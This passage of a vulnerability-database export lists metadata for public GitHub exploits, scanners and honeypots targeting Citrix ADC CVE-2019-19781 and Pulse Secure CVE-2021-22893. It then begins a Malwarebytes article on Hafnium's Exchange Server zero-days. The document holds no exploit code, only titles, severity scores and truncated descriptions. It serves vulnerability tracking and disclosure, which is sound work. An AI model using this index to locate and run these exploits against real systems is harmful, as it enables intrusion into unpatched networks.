"8DBBEAEC-C905-52CD-B95C-87663EA9C145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:59:30", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-08-17T19:20:50", "id": "51858F11-1259-5A40-82DF-DD7D62A7B11A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T13:54:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-08T10:42:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-11-28T06:33:59", "id": "3BFD8B83-5790-508D-8B9C-58C171517BD0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:27:24", "description": "# Citrix Analysis Notebook\n\nA jupyter notebook to aid in automat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T04:59:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-02-21T02:51:51", "id": "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:08", "description": "# CVE-2019-19781_IOCs\nIOCs for CVE-2019-19781\n\ncitrixhoneypotnsl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T19:32:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T19:37:59", "id": "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:48", "description": "# CVE-2019-19781\n\u6279\u91cf\u6982\u5ff5\u9a57\u8b49\u7528\n\u4f7f\u7528\u9650\u5236\n----------------------...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T06:09:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T06:23:10", "id": "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:04", "description": "# Detect-CVE-2019-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T10:09:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T10:35:07", "id": "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:12", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T15:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-12-13T12:56:50", "id": "F27B127B-57F0-5352-B92F-B6F921378CBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:17", "description": "# Shitrix-CVE-2019-19781\nMy working approach t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T18:53:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-21T15:54:44", "id": "2849E613-8689-58E7-9C55-A0616B66C91A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:51", "description": "# citrix.sh\nCVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-20T15:30:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-19T01:10:14", "id": "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:24", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T20:43:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-19T06:52:48", "id": "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:32", "description": "# CVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T14:26:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T14:30:49", "id": "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:12", "description": "# CVE-2019-19781-Checker\nCheck your website for CVE-2019-19781 V...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T10:15:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T10:20:33", "id": "721C46F4-C390-5D23-B358-3D4B22959428", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:34", "description": "# CVE-2019-19781\nCitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T13:05:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-09-17T11:46:50", "id": "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T09:14:12", "description": "# Citrix ADC (NetScaler) Honeypot\n- Detects and logs payloads fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T13:00:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-05-11T04:52:56", "id": "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:48", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T05:17:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T05:17:29", "id": "0829A67E-3C24-5D54-B681-A7F72848F524", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:58", "description": "# CVE-2019-19781\nCVE-2019-19781 Attack Triage Script\n\nThe script...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T16:14:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-21T16:48:21", "id": "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:48", "description": "# CVE-2019-19781\nJust a python3 CVE-2019-19781 exploit for Citri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-28T12:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-28T21:23:04", "id": "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:49", "description": "# CVE-NetScalerFileSystemCheck\r\nThis script checks the Citrix Ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T08:52:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-06-21T13:40:35", "id": "6787DC40-24C2-5626-B213-399038EFB0E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "malwarebytes": [{"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * 